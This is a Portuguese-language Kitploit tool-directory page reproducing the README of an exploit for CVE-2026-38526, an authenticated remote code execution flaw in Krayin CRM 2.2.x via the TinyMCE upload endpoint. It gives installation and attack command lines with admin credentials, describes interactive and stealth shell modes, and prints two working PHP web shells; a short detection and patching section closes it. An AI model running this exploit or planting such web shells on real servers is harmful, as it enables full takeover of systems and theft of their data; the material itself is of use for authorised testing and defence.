Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
KrayinCRM-RCE-Exploit-CVE-2026-38526 — CVE-2026-38526 exploit para Krayin CRM v2.2.x - RCE autenticado via bypass de upload de arquivo TinyMCE. Recursos: shell interativo, payloads de múltiplos tipos, geração automática de shell e verificação. Autor: Sudeepa Wanigarathna. Apenas para testes autorizados. | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingGeração de Shellcode
GitHub
cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

KrayinCRM-RCE-Exploit-CVE-2026-38526

CVE-2026-38526 exploit para Krayin CRM v2.2.x - RCE autenticado via bypass de upload de arquivo TinyMCE. Recursos: shell interativo, payloads de múltiplos tipos, geração automática de shell e verificação. Autor: Sudeepa Wanigarathna. Apenas para testes autorizados.

Ver Repositório
318há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔓 Krayin CRM v2.2.x - Exploração de Execução Remota de Código Autenticada

License: MIT CVE-2026-38526

⚠️ APENAS PARA TESTES DE SEGURANÇA AUTORIZADOS - O uso não autorizado é ilegal e antiético.

📋 Visão Geral

Esta ferramenta de exploração demonstra uma vulnerabilidade crítica de execução remota de código (RCE) autenticada descoberta no Krayin CRM versão 2.2.x. A vulnerabilidade existe na funcionalidade de upload de arquivos do TinyMCE, que permite que administradores autenticados enviem e executem código PHP arbitrário no servidor.

PropriedadeValor
ID CVECVE-2026-38526
Software AfetadoKrayin CRM v2.2.x
Tipo de VulnerabilidadeExecução Remota de Código Autenticada (RCE)
Autenticação NecessáriaSim (acesso nível Admin)
ImpactoComprometimento completo do sistema
Pontuação CVSS8.8 (Alto)

🚨 Detalhes da Vulnerabilidade

A vulnerabilidade decorre de validação insuficiente do tipo de arquivo no endpoint de upload do TinyMCE (/admin/tinymce/upload). Um administrador autenticado pode:

  • Enviar um arquivo PHP disfarçado com um tipo MIME de imagem.
  • O arquivo é armazenado em um local acessível pela web.
  • O atacante pode então executar código PHP arbitrário no servidor.

Versões Afetadas

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • Todas as versões 2.2.x antes do lançamento do patch

✨ Recursos

  • Múltiplos Tipos de Shell: Básico, Avançado, Mínimo, Gerenciador de Arquivos e Personalizado.
  • Shell Interativo: Interface completa semelhante a terminal com histórico de comandos.
  • Upload de Arquivos: Enviar arquivos adicionais através do shell.
  • Extração de Token CSRF: Tratamento automático da proteção CSRF.
  • Suporte a Proxy: Roteamento de tráfego através de proxies HTTP/HTTPS.
  • Formatos de Saída Flexíveis: Texto, JSON ou modo Silencioso.
  • Lógica de Repetição: Repetição automática em caso de falhas de conexão.
  • Cabeçalhos Personalizados: Suporte para cabeçalhos HTTP personalizados.
  • Modo Detalhado: Saída de depuração detalhada.
  • Suporte SSL: Verificação opcional de certificado SSL.

📦 Instalação

Requisitos

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

Instalação Rápida

git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

Arquivo de Requisitos (requirements.txt)

httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 Uso

Sintaxe Básica do Comando

python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <SENHA> [OPÇÕES]

Parâmetros Obrigatórios

ParâmetroDescrição
-t, --targetURL do alvo (ex.: http://192.168.1.100)
-u, --usernameNome de usuário ou e-mail do admin
-p, --passwordSenha do administrador

Exemplos Comuns de Uso

# Exploração básica com shell gerado
python3 exploit.py -t http://target.com -u [email protected] -p password

# Enviar arquivo PHP personalizado
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# Gerar shell avançado com modo interativo
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# Gerar arquivo shell sem exploração
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# Usar com proxy para teste/depuração
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# Saída JSON para automação
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# Modo detalhado com timeout personalizado
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# User-Agent e cabeçalhos personalizados
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 Tipos de Shell

  1. Shell Básico (basic) Execução simples de comando com a função system().

    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. Shell Avançado (advanced) Shell rico em recursos com:

    • Múltiplos métodos de execução de comandos
    • Interface web bonita semelhante a terminal
    • Suporte a histórico de comandos
    • Exibição do usuário atual e nome do host
  3. Shell Mínimo (minimal) Pegada mínima para furtividade.

    <?php system($_GET["cmd"]); ?>
    
  4. Gerenciador de Arquivos (file_manager) Interface completa de gerenciamento de arquivos:

    • Upload de arquivos
    • Exclusão de arquivos
    • Criação de diretórios
    • Navegação
    • Visualizador de permissões de arquivos
  5. Shell Personalizado (custom) Use seu próprio arquivo PHP shell com o parâmetro -f.

📝 Formatos de Saída

Formato Texto (Padrão)

Saída colorida legível por humanos, adequada para uso interativo.

Formato JSON (-o json)

Formato legível por máquina para automação e integração.

{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

Formato Silencioso (-q, --quiet)

Nenhuma saída, exceto erros. Útil para processamento em lote.

⚙️ Opções Avançadas

OpçãoDescriçãoPadrão
--timeoutTempo limite da requisição em segundos30
--retryNúmero de tentativas de repetição3
--retry-delayAtraso entre tentativas em segundos2
--user-agentString User-Agent personalizadaUA do navegador padrão
--headerCabeçalhos HTTP personalizados (Chave: Valor)Nenhum
--verify-sslVerificar certificados SSLFalse
--proxyURL do proxy HTTP/HTTPSNenhum
-v, --verboseHabilitar saída de depuraçãoFalse
-q, --quietSuprimir toda a saídaFalse

Exemplo de Cabeçalhos Personalizados

--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 Detecção e Prevenção

Sinais de Comprometimento (IoC)

  • Arquivos a Monitorar:

    • Arquivos PHP incomuns em public/storage/upload/
    • Arquivos com extensões duplas (ex.: image.php.jpg)
    • Novos arquivos com nomes suspeitos
  • Logs a Verificar:

    • Requisições POST para /admin/tinymce/upload
    • Horários incomuns de login de administrador
    • Tentativas de autenticação com falha
  • Indicadores do Sistema:

    • Processos inesperados em execução
    • Novos cron jobs
    • Arquivos do sistema modificados

Medidas de Prevenção

  • Ações Imediatas:
    # Atualizar para versão corrigida
    composer update krayin/crm
    
Baixar ferramenta